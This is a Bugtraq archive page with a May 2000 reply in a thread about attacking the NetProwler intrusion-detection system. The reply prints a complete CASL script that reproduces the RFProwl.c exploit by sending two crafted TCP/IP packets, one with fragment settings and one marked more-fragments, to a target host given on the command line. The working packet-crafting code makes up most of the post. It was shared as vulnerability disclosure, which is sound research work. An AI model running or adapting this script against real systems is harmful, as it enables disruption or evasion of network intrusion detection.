Bugtraq mailing list archives

Re: RFP2K05: NetProwler vs. RFProwler

From: quinta () CERTBR COM BR (Pedro Quintanilha)
Date: Tue, 23 May 2000 20:38:47 -0300


A little more about...

There is a CASL Script that reproduces the RFProwl.c exploit.

This exploit sends two packets with wrong IP checksum, so I
think that it´s not a serious threat like remote attacks from Internet,
since the most routers and firewalls will drop that packets.

[]´s

Pedro Quintanilha
quinta () certbr com br

=================================================
#include "tcpip.casl"
#include "packets.casl"

Src = pop args;
Dst = pop args;

Src = getip(Src);
Dst = getip(Dst);

iph = copy TCPIP;
iph.ip_version = 4;
iph.ip_headerlen = 5;
iph.ip_tos = 0;
iph.ip_length = 36;
iph.ip_id  = 2233;
iph.ip_offset = 3;
iph.ip_ttl = 62;
iph.ip_protocol = 6;
iph.ip_cksum = 38648;
iph.ip_source = Src;
iph.ip_destination = Dst;

tch = copy SYN;
tch.tcp_source = 1026;
tch.tcp_destination = 2058;
tch.tcp_seqno = 2542901;
tch.tcp_ackno = 0;
tch.tcp_offset = 0;
tch.tcp_x2 = 1;
tch.tcp_syn = 1;
tch.tcp_window = 768;

pk1data = "\x 0\x 0\x 0\x 0\x 0\x 0";

packet = [ iph, tch, pk1data ];

ip_output(packet);

iph2 = copy TCPIP;
iph2.ip_version = 4;
iph2.ip_headerlen = 5;
iph2.ip_tos = 0;
iph2.ip_length = 44;
iph2.ip_id = 2239;
iph2.ip_mf = 1;
iph2.ip_ttl = 62;
iph2.ip_protocol = 6;
iph2.ip_cksum = 30445;
iph2.ip_source = Src;
iph2.ip_destination = Dst;

tch2 = copy SYN;
tch2.tcp_source = 1032;
tch2.tcp_destination = 21;
tch2.tcp_seqno = 2816737352;
tch2.tcp_ackno = 0;
tch2.tcp_x2 = 10;
tch2.tcp_syn = 1;
tch2.tcp_window = 32120;
tch2.tcp_cksum = 29341;

pk2data = "\x 2\x 4\x 5\xb4 \x 0\x 0";

packet = [ iph2, tch2, pk2data ];

ip_output(packet);
=================================================

Current thread:

Re: RFP2K04: Mining BlackICE with RFPickAxe, (continued)
- - - Re: RFP2K04: Mining BlackICE with RFPickAxe Robert Graham (May 17)
    - antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Sebastian (May 18)
    - Re: antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Mudge (May 18)
    - Re: RFP2K04: Mining BlackICE with RFPickAxe Matt (May 18)
    - AUX Security Advisory on Be/OS 5.0 (DoS) visi0n (May 17)
    - Re: RFP2K04: Mining BlackICE with RFPickAxe Andrew Lambeth (May 19)
    - Remote Dos attack against Intel express 8100 router Dimuthu Parussalla (May 18)
    - RFP2K05: NetProwler vs. RFProwler rain forest puppy (May 19)
    - Key Generation Security Flaw in PGP 5.0 gec () ACM ORG (May 23)
    - Filesystem vulnerability in AIX salme () US IBM COM (May 23)
    - Re: RFP2K05: NetProwler vs. RFProwler Pedro Quintanilha (May 23)
    - Security Vulnerability in Qpopper 2.53 (Upgrade to 3.0.2) Qpopper Support (May 23)
    - Remote xploit for MDBMS |[TDP]| (May 24)
    - HP Web JetAdmin Version 6.0 Remote DoS attack Vulnerability Ussr Labs (May 24)
    - Re: RFP2K04: Mining BlackICE with RFPickAxe rain forest puppy (May 19)
    - revised patches for kerberos vulnerability Tom Yu (May 19)
    - Microsoft Security Bulletin (MS00-029) Microsoft Product Security (May 19)
    - BindView Security Advisory: jolt2 - Remote DoS against NT, W2K, 9x BindView Security Advisory (May 19)
    - Bugtraq Stats for the last 3 years available now. Alfred Huger (May 17)
  - KNapster Vulnerability Compromises User-readable Files Tom Daniels (May 10)
  - Gnapster Vulnerability Compromises User-readable Files Jim Early (May 10)

(Thread continues...)